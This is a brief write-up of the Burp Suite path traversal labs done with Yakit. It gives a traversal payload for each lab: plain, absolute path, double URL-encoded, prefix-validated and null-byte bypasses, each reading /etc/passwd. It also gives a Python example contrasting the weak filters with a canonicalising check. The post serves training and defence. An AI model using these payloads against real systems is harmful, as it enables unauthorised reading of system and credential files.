Working Through the BurpSuite Labs with Yakit: Path Traversal
Lab 1
File path traversal, simple case
../../../../../../etc/passwd
Lab 2
File path traversal, traversal sequences blocked with absolute path bypass
/etc/passwd
Lab 3
File path traversal, traversal sequences stripped non-recursively
....//....//....//....//....//etc/passwd
Lab 4
File path traversal, traversal sequences stripped with superfluous URL-decode
..%252F..%252F..%252F..%252Fetc%252Fpasswd
Lab 5
File path traversal, validation of start of path
/var/www/images/../../../../etc/passwd
Lab 6
File path traversal, validation of file extension with null byte bypass
../../../../etc/passwd%00.jpg
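Why the filters named in Labs 3 to 6 fail, next to a check that canonicalises the path before testing containment. This is an added example, not code from the labs or from the original post; the function names, the `BASE` constant and the file name `23.jpg` are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

BASE = "/var/www/images"  # image directory taken from the Lab 5 payload

def strip_once(name):
    """Lab 3 style filter: delete '../' in one non-recursive pass."""
    return name.replace("../", "")

def strip_then_decode(name):
    """Lab 4 style filter: delete '../', then URL-decode a second time."""
    return unquote(name.replace("../", ""))

def starts_with_base(name):
    """Lab 5 style check: only the prefix of the supplied path is tested."""
    return name.startswith(BASE + "/")

def has_jpg_suffix(name):
    """Lab 6 style check: only the suffix is tested."""
    return name.endswith(".jpg")

def safe_resolve(name):
    """Canonicalise first, then verify containment. `name` must already be
    fully decoded. Returns the normalised path, or None when rejected.
    Assumption: no symlinks under BASE; on a real filesystem use
    os.path.realpath instead of normpath."""
    if "\x00" in name:  # a NUL would truncate the name in native file APIs
        return None
    full = posixpath.normpath(posixpath.join(BASE, name))
    if not full.startswith(BASE + "/"):
        return None
    return full

# Payloads from the labs above, as the application sees them after the
# web server's own single URL-decode.
LAB3 = "....//....//....//....//....//etc/passwd"
LAB4 = unquote("..%252F..%252F..%252F..%252Fetc%252Fpasswd")
LAB5 = "/var/www/images/../../../../etc/passwd"
LAB6 = unquote("../../../../etc/passwd%00.jpg")

if __name__ == "__main__":
    for label, value in [("lab3", strip_once(LAB3)),
                         ("lab4", strip_then_decode(LAB4)),
                         ("lab5", LAB5), ("lab6", LAB6),
                         ("ok", "23.jpg")]:  # constructed benign file name
        print(label, repr(value), "->", safe_resolve(value))
```

Each weak filter either hands back a working traversal sequence or accepts the input outright, while `safe_resolve` rejects all of them, including the absolute path from Lab 2, and still serves an ordinary file name.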
This post is licensed by the author under CC BY 4.0.